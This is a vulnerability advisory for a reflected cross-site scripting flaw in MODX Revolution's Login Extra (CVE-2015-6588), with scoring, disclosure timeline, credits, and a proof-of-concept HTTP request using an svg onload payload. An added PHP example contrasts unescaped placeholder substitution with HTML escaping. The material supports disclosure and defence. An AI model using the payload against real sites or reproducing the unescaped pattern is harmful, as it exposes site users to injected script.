MODX Reflected Cross-Site Scripting on Login Screen
I. INTRODUCTION
MODX Revolution is the web content management platform for those that truly care about no-compromise design and exceptional user experience. It gives you complete control over your site and content, with the flexibility and scalability to adapt to your changing needs.
More information about MODX is available on the official website at the following URL:
Vendor Homepage : http://modx.com/
II. DESCRIPTION
Veit Hailperin or Michael Schneider at scip AG found a Reflected Cross-Site Scripting (XSS) vulnerability in the login extra of MODX Revolution prior to version 1.9.1.
If a parameter is passed to the login page, it is copied verbatim into the response, because the placeholder [+request_uri] in the login package is output unfiltered.
III. SCORING
CVSS Base Score 5 (CVSS#AV:N/AC:L/Au:N/C:N/I:P/A:N)
IV. EXPLOITATION
Proof-of-Concept
POST /login.html?a"><svg/onload=alert(1)> HTTP/1.1
Host: vulnerable-installation.tld
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 74

username=admin&password=admin&returnUrl=%2Fde%2F&service=login&Login=Login
V. IMPACT
This is a traditional reflected cross-site scripting vulnerability with the usual impact.
VI. SOLUTION
MODX has released a patched version (1.9.1) of the Login Extra.
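The class of fix for an unfiltered placeholder such as [+request_uri], shown here as an added example that is not Login Extra code and not the vendor's patch. The renderer functions, the form chunk and the sample URI are hypothetical and constructed for illustration; the chunk assumes the URI is written into a double-quoted attribute.

```php
<?php
declare(strict_types=1);

// Hypothetical stand-in for a template engine that fills [+name] placeholders.
// Not MODX or Login Extra code.

/** Vulnerable form: placeholder values are substituted verbatim. */
function renderRaw(string $tpl, array $values): string
{
    $map = [];
    foreach ($values as $name => $value) {
        $map['[+' . $name . ']'] = (string) $value;
    }
    // strtr() with an array replaces in a single pass, so a value that itself
    // contains "[+...]" is not expanded a second time.
    return strtr($tpl, $map);
}

/** Hardened form: every value is HTML-encoded before substitution. */
function renderEscaped(string $tpl, array $values): string
{
    $map = [];
    foreach ($values as $name => $value) {
        // ENT_QUOTES encodes both quote styles, which matters when the
        // placeholder sits inside an attribute value.
        $map['[+' . $name . ']'] =
            htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
    return strtr($tpl, $map);
}

// Constructed login form chunk (assumption): the URI lands in a quoted attribute.
$chunk = '<form action="[+request_uri]" method="post">';

// Constructed request URI with the shape of the advisory's proof of concept.
$requestUri = '/login.html?a"><svg/onload=alert(1)>';

$raw  = renderRaw($chunk, ['request_uri' => $requestUri]);
$safe = renderEscaped($chunk, ['request_uri' => $requestUri]);

echo "raw:     {$raw}\n";
echo "escaped: {$safe}\n";

// Check whether attacker-supplied markup survived as a tag in each output.
echo 'raw contains <svg tag:     ', var_export(strpos($raw, '<svg') !== false, true), "\n";
echo 'escaped contains <svg tag: ', var_export(strpos($safe, '<svg') !== false, true), "\n";
```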
VII. VENDOR RESPONSE
The vendor has been contacted and has replied.
VIII. DISCLOSURE TIMELINE
2015/05/18 Identification of the vulnerability
2015/08/28 First contact with MODX by E-Mail
2015/08/31 Answer from MODX Security Team
2015/08/31 Sending technical details and requesting a date for the fix
2015/09/01 CVE assigned CVE-2015-6588
2015/09/21 Because no concrete date was proposed by MODX, it is set to November 24th
2015/11/24 Release of advisory
2015/11/26 Release of patch
IX. CREDITS
The vulnerability was discovered by Veit Hailperin or Michael Schneider.
Veit Hailperin, Michael Schneider, scip AG, Zuerich, Switzerland
veha-at-scip.ch, misc-at-scip.ch
http://www.scip.ch
A1. LEGAL NOTICES
Copyright (c) 2002-2015 scip AG, Switzerland.
Permission is granted for the re-distribution of this alert. It may not
be edited in any way without permission of scip AG.
The information in the advisory is believed to be accurate at the time
of publishing based on currently available information. There are no
warranties with regard to this information. Neither the author nor the
publisher accepts any liability for any direct, indirect or
consequential loss or damage from use of or reliance on this advisory.